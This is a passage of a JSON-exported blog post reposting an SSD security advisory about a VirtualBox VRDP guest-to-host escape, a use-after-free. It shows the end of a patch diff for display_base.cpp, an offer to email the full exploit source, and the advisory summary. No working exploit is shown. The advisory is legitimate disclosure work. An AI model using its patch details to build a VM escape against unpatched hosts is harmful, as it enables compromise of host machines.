data-line=\"crayon-5b7b3e582f585478629742-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f585478629742-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f585478629742-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f585478629742-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f585478629742-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f585478629742-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f585478629742-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f585478629742-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f585478629742-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f585478629742-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f585478629742-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f585478629742-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f585478629742-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f585478629742-14\">14<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f585478629742-1\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VirtualBox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">5.2.16<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">HostServices<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SharedOpenGL<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">crserverlib<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">presenter<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">display_base<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cpp<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f585478629742-2\"><span class=\"crayon-o\">++<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VirtualBox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">5.2.18<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">HostServices<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SharedOpenGL<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">crserverlib<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">presenter<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">display_base<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">cpp<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f585478629742-3\"><span class=\"crayon-sy\">@<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">326<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">326<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-sy\">@<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f585478629742-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">WARN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;err&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f585478629742-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f585478629742-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f585478629742-7\"><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f585478629742-8\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">CrFbVisitCreatedEntries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">mpFb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">entriesDestroyCb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f585478629742-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f585478629742-10\"><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f585478629742-11\"><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">CrFbVisitCreatedEntries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">mpFb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">entriesDestroyCb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f585478629742-12\"><span class=\"crayon-o\">+<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f585478629742-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rc<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f585478629742-14\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0029 seconds] -->  <\/p>\n<p>If you are interested in viewing the full source code of the exploit, we would glad to send it to you. Email us at: ssd[at]beyondsecurity.com.<\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3736\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Mon, 20 Aug 2018 06:00:52 +0000<\/strong><\/p>\n<p>Vulnerability Summary VirtualBox has a built-in RDP server which provides access to a guest machine. While the RDP client sees the guest OS, the RDP server runs on the host OS. Therefore, to view the guest OS the RDP client will make a connection to the host OS IP address rather than the guest OS &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3736\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 VirtualBox VRDP Guest-to-Host Escape<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15244,10757,13145],"class_list":["post-13153","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-sandbox-escape","tag-securiteam-secure-disclosure","tag-use-after-free"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13153","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13153"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13153\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13153"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13153"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13153"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}